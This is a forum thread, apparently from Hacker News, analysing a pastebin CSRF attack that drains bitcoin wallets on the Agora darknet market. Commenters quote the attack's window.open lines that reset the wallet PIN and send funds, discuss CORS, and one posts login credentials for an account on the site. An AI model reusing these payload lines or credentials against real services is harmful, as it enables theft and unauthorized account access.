

CSRF to steal Bitcoins from Agora via email link - zenincognito
http://pastebin.com/WxQyS7zA

======
aakilfernandes
At first I thought this was some crazy low-level hack since I saw all the hex
code. But that's just a library used by the hacker (it's not really part of the
hack).

Scroll all the way to the bottom and you'll see the meat of it. It's a bunch of
window.opens to certain URLs that cause money to be transferred out of the
wallets.

I'm not sure why they use window.open instead of AJAX requests. Is there
something on Tor Browser that would prevent that?

    window.open (url+"/startresetpin?action=askresetpinaction&controller=user&confirmed=true&confirm-submit=", "_blank");
    window.open (url+"/resetpin?pin1=1111&pin2=1111&submit=Save", "_blank");
    window.open (redirectUrl+"?action=send&amount=1&wait=1", "_blank");
    window.open (redirectUrl+"?action=send&amount=0.01&wait=2", "_blank");

Edit: looks like that library isn't even used by the hack. Maybe it's just
there to dissuade onlookers from reading the code.

~~~
dnet
Same Origin Policy would prevent AJAX requests, CSRF attacks thus usually use
hidden forms -- window.open achieves the same, but with the opportunity to
send multiple requests.

~~~
kpcyrd
This isn't the case anymore. Since CORS was introduced, you can send XHR GET
requests to arbitrary domains.

The browser then checks if the appropriate CORS headers are set. If they are,
you can access the response. If they aren't, you can't.

As a sane developer you are supposed not to trigger ANY actions on a GET
anyway and there are a lot more ways to trigger them, so this is not an issue
in the browser.

For POST and friends it's a bit more complicated: the browser sends an OPTIONS
request first and checks if the CORS headers are set, and only if they are is the
actual POST submitted.

Fun fact: it looks like it's possible to exploit this issue silently even with
JavaScript disabled and NoScript installed; it's quite lame to do it the way
they did.

------
PaulSec
Just sends GET requests to a bunch of URLs in order to steal your bitcoins. This
attack was explained and analyzed a couple of weeks ago already. Back at
the time, it was about 84 BTC that they tried to launder.

~~~
moeadham
Neat. Do you happen to know the BTC address where it tries to send the funds?

~~~
PaulSec
BTC addresses change all the time and I suspect they are generated randomly as
soon as you reach their page.

------
ajdlinux
I like the inclusion of the AES library's MIT licence terms.

~~~
PaulSec
Yeah, completely bullshit, doesn't do anything..

------
celticninja
Can someone explain what this does?

~~~
jawr
The important bit seems to be in `window.onbeforeunload`

Looks like it tries to brute force a pin reset and then attempts to send a
bunch of bitcoin sends.

I'm guessing it depends on the user running on Tor and still being logged in
to [http://sydneymfsnkpw7ln.onion](http://sydneymfsnkpw7ln.onion), whatever
that is?

~~~
garrettgrimsley
It doesn't have to brute force the reset because Agora requires knowledge of
neither the current PIN nor the current account password to reset the PIN.

    window.open (url+"/startresetpin?action=askresetpinaction&controller=user&confirmed=true&confirm-submit=", "_blank")

Starts the PIN reset process and

    window.open (url+"/resetpin?pin1=1111&pin2=1111&submit=Save", "_blank")

sets the new PIN. For reference, Agora is lauded as one of the most secure
darknet markets. You can see the lack of CSRF protection for yourself with the
credentials username::password::pin ggHNpinReset::qwertyuiop::1234.

